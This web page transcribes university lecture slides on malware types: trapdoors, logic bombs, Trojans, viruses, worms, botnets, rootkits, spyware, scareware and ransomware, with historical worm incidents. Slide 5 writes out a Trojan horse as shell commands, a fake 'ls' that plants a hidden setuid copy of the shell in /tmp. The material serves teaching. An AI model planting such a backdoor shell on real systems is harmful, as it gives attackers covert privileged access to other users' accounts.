Presentation is loading. Please wait.

Presentation is loading. Please wait.

CS426Fall 2010/Lecture 151 Computer Security CS 426 Lecture 15 Malwares.

Published byCecil Barker Modified over 9 years ago

Similar presentations

Presentation on theme: "CS426Fall 2010/Lecture 151 Computer Security CS 426 Lecture 15 Malwares."— Presentation transcript:

1 CS426Fall 2010/Lecture 151 Computer Security CS 426 Lecture 15 Malwares

2 CS426Fall 2010/Lecture 152 Trapdoor Secret entry point into a system –Specific user identifier or password that circumvents normal security procedures. Commonly used by developers –Could be included in a compiler.

3 CS426Fall 2010/Lecture 153 Logic Bomb Embedded in legitimate programs Activated when specified conditions met –E.g., presence/absence of some file; Particular date/time or particular user When triggered, typically damages system –Modify/delete files/disks

4 Example of Logic Bomb In 1982, the Trans-Siberian Pipeline incident occurred. A KGB operative was to steal the plans for a sophisticated control system and its software from a Canadian firm, for use on their Siberian pipeline. The CIA was tipped off by documents in the Farewell Dossier and had the company insert a logic bomb in the program for sabotage purposes. This eventually resulted in "the most monumental non-nuclear explosion and fire ever seen from space“. CS426Fall 2010/Lecture 154

5 CS426Fall 2010/Lecture 155 Trojan Horse Example: Attacker: Place the following file cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* as /homes/victim/ls Victim ls Program with an overt (expected) and covert effect –Appears normal/expected –Covert effect violates security policy User tricked into executing Trojan horse –Expects (and sees) overt behavior –Covert effect performed with user’s authorization

6 CS426Fall 2010/Lecture 156 Virus Self-replicating code –Like replicating Trojan horse –Alters normal code with “infected” version No overt action –Generally tries to remain undetected Operates when infected code executed If spread condition then For target files if not infected then alter to include virus Perform malicious action Execute normal program

7 CS426Fall 2010/Lecture 157 Virus Infection Vectors Boot Sector (USB drives) Executable Macro files

8 CS426Fall 2010/Lecture 158 Virus Properties Terminate and Stay Resident –Stays active in memory after application complete –Allows infection of previously unknown files Trap calls that execute a program Stealth –Conceal Infection Trap read and disinfect Let execute call infected file –Encrypt virus Prevents “signature” to detect virus –Polymorphism Change virus code to prevent signature

9 CS426Fall 2010/Lecture 159 Worm Runs independently –Does not require a host program Propagates a fully working version of itself to other machines Carries a payload performing hidden tasks –Backdoors, spam relays, DDoS agents; … Phases –Probing  Exploitation  Replication  Payload

10 CS426Fall 2010/Lecture 1510 Examples of Worm attacks Morris worm, 1988 –Exploits buffer overflow in fingerd, and other vulnerabilities –Infected approximately 6,000 machines 10% of computers connected to the Internet –cost ~ $10 million in downtime and cleanup Code Red I & II worms, 2001 –Direct descendant of Morris’ worm; Exploit buffer overflow in IIS –Infected more than 500,000 servers –Caused ~ $2.6 Billion in damages,

11 More Examples of Worm Attacks Nimda Worm (2001)Fast spreading –Uses five different ways to propagate Including using backdoors left by other worms SQL Slammer (2003) Fast spreading –Exploits Microsoft SQL server –Infects 75,000 hosts within 10 minutes Conficker (2008,2009)Evolving & –Exploits Windows server service (and other vectors in variants) –Infects between 9 and 15 million computers –Evolver, persists, self-update, and eventually install a spambot & a scareware CS426Fall 2010/Lecture 1511

12 CS426Fall 2010/Lecture 1512 Email Worms: Spreading as Email Attachments Love Bug worm (ILOVEYOU worm) (2000): –May 3, 2000: 5.5 to 10 billion dollars in damage MyDoom worm (2004) –First identified in 26 January 2004: –On 1 February 2004, about 1 million computers infected with Mydoom begin a massive DDoS attack against the SCO group Storm worm & Storm botnet (2007) –Identified on January 17 –gathering infected computers into the Storm botnet. –By around June 30 th infected 1.7 million computers, –By September, has between 1 and 10 million bots

13 CS426Fall 2010/Lecture 1513 Zombie & Botnet Secretly takes over another networked computer by exploiting software flows Builds the compromised computers into a zombie network or botnet –a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. Uses it to indirectly launch attacks –E.g., DDoS, phishing, spamming, cracking

14 CS426Fall 2010/Lecture 1514 Detailed Steps (1) Unsecured Computers Attacker Attacker scans Internet for unsecured systems that can be compromised 1 Internet

15 CS426Fall 2010/Lecture 1515 Detailed Steps (2) Unsecured Computersbie Attacker Internet Attacker secretly installs zombie agent programs, turning unsecured computers into zombies 2 Zombies

16 CS426Fall 2010/Lecture 1516 Detailed Steps (3) Attacker Internet Zombie agents Zombie agents ``phone home’’ and connect to a master server 3 Zombies Master Server

17 CS426Fall 2010/Lecture 1517 Detailed Steps (4) Attacker Internet Zombies Master Server Attacker sends commands to Master Server to launch a DDoS attack against a targeted system 4

18 CS426Fall 2010/Lecture 1518 Internet Detailed Steps (5) Attacker Zombies Master Server Master Server sends signal to zombies to launch attack on targeted system 5 Targeted System

19 CS426Fall 2010/Lecture 1519 Internet Detailed Steps (6) Attacker Zombies Master Server Targeted system is overwhelmed by zombie requests, denying requests from normal users 6 Targeted System User Request Denied

20 Botnet Using peer-to-peer structure, rather than a central command & control Encrypting/authenticating communications CS426Fall 2010/Lecture 1520

21 CS426Fall 2010/Lecture 1521 Rootkit Software used after system compromise to: – Hide the attacker’s presence – Provide backdoors for easy reentry Simple rootkits: – Modify user programs (ls, ps) – Detectable by tools like Tripwire Sophisticated rootkits: – Modify the kernel itself – Hard to detect from userland

22 CS426Fall 2010/Lecture 1522 Rootkit Classification Traditional RootKit Kernel Trojan login Trojan ps Trojan ifconfig good tripwire Kernel-level RootKit Kernel good login good ps good ifconfig good tripwire Trojan Kernel Module Application-level Rootkit Kernel Evil Program good program good program good program good program Shadow Walker, adore Hxdef, NTIllusion Lrk5, t0rn

23 CS426Fall 2010/Lecture 1523 Rootkit Classification Under-Kernel RootKit Kernel good login good ps good ifconfig good tripwire Evil VMM SubVirt, ``Blue Pill’’ Hypervisor Hardware/firmwar e

24 Spyware Malware that collects little bits of information at a time about users without their knowledge –Keyloggers: –May also tracking browsing habit –May also re-direct browsing and display ads Typically do not self-propagate CS426Fall 2010/Lecture 1524

25 Scareware Software –with malicious payloads, or of limited or no benefit –Sold by social engineering to cause shock, anxiety, or the perception of a threat Rapidly increasing –Anti-Phishing Working Group: # of scareware packages rose from 2,850 to 9,287 in 2nd half of 2008. –In 1st half of 2009, the APWG identified a 583% increase in scareware programs. CS426Fall 2010/Lecture 1525

26 CS426Fall 2010/Lecture 1526

27 Ransomware Holds a computer system, or the data it contains, hostage against its user by demanding a ransom. –Disable an essential system service or lock the display at system startup –Encrypt some of the user's personal files, originally referred to as cryptoviruses, cryptotrojans or cryptoworms Victim user has to –enter a code obtainable only after wiring payment to the attacker or sending an SMS message –buy a decryption or removal tool CS426Fall 2010/Lecture 1527

28 CS426Fall 2010/Lecture 1528 Readings for This Lecture Wikipedia Malware Computer Virus Computer Worm Botnet Spyware

29 CS426Fall 2010/Lecture 1529 Coming Attractions … More Malware: Examining some Worms

Download ppt "CS426Fall 2010/Lecture 151 Computer Security CS 426 Lecture 15 Malwares."

Similar presentations

Thank you to IT Training at Indiana University Computer Malware.

Thank you to IT Training at Indiana University Computer Malware.
September,2012 Managing Files and Folders 4/23/2015 Compiled By:- Solomon W. Demissie 1.

September,2012 Managing Files and Folders 4/23/2015 Compiled By:- Solomon W. Demissie 1.
Lecture: Malicious Code CIS 3360 Ratan K. Guha. Malicious Code2 Overview and Reading Assignments Defining malicious logic Types Action by Viruses Reading.

Lecture: Malicious Code CIS 3360 Ratan K. Guha. Malicious Code2 Overview and Reading Assignments Defining malicious logic Types Action by Viruses Reading.
Lecture 13 Malicious Software modified from slides of Lawrie Brown.

Lecture 13 Malicious Software modified from slides of Lawrie Brown.
Dr. John P. Abraham Professor UTPA 2 – Systems Threats and Risks.

Dr. John P. Abraham Professor UTPA 2 – Systems Threats and Risks.
CS526: Information Security Chris Clifton November 25, 2003 Malicious Code.

CS526: Information Security Chris Clifton November 25, 2003 Malicious Code.
Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious.

Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious.
Chapter 14 Computer Security Threats

Chapter 14 Computer Security Threats
Chapter 14 Computer Security Threats Patricia Roy Manatee Community College, Venice, FL ©2008, Prentice Hall Operating Systems: Internals and Design Principles,

Chapter 14 Computer Security Threats Patricia Roy Manatee Community College, Venice, FL ©2008, Prentice Hall Operating Systems: Internals and Design Principles,
Malicious Software programs exploiting system vulnerabilities known as malicious software or malware program fragments that need a host program e.g. viruses,

Malicious Software programs exploiting system vulnerabilities known as malicious software or malware program fragments that need a host program e.g. viruses,
1 Pertemuan 05 Malicious Software Matakuliah: H0242 / Keamanan Jaringan Tahun: 2006 Versi: 1.

1 Pertemuan 05 Malicious Software Matakuliah: H0242 / Keamanan Jaringan Tahun: 2006 Versi: 1.
Cryptography and Network Security Third Edition by William Stallings Lecture slides by Lawrie Brown.

Cryptography and Network Security Third Edition by William Stallings Lecture slides by Lawrie Brown.
What Are Malicious Attacks? Malicious Attacks are any intentional attempts that can compromise the state of your computer. Including but not limited to:

What Are Malicious Attacks? Malicious Attacks are any intentional attempts that can compromise the state of your computer. Including but not limited to:
Copyright © 1995-2009 Clifford Neuman - UNIVERSITY OF SOUTHERN CALIFORNIA - INFORMATION SCIENCES INSTITUTE USC CSci530 Computer Security Systems Lecture.

Copyright © Clifford Neuman - UNIVERSITY OF SOUTHERN CALIFORNIA - INFORMATION SCIENCES INSTITUTE USC CSci530 Computer Security Systems Lecture.
Viruses, Hacking, and AntiVirus. What is a Virus? A type of Malware – Malware is short for malicious software A virus – a computer program – Can replicate.

Viruses, Hacking, and AntiVirus. What is a Virus? A type of Malware – Malware is short for malicious software A virus – a computer program – Can replicate.
CS5261 Information Security CS 526 Topic 10 Malwares Topic 10: Malware.

CS5261 Information Security CS 526 Topic 10 Malwares Topic 10: Malware.
Chapter Nine Maintaining a Computer Part III: Malware.

Chapter Nine Maintaining a Computer Part III: Malware.
Henric Johnson1 Chapter 10 Malicious Software Henric Johnson Blekinge Institute of Technology, Sweden

Henric Johnson1 Chapter 10 Malicious Software Henric Johnson Blekinge Institute of Technology, Sweden
Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 7 – Malicious Software.

Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 7 – Malicious Software.
Malicious Software Malicious Software Han Zhang & Ruochen Sun.

Malicious Software Malicious Software Han Zhang & Ruochen Sun.

Similar presentations

Ads by Google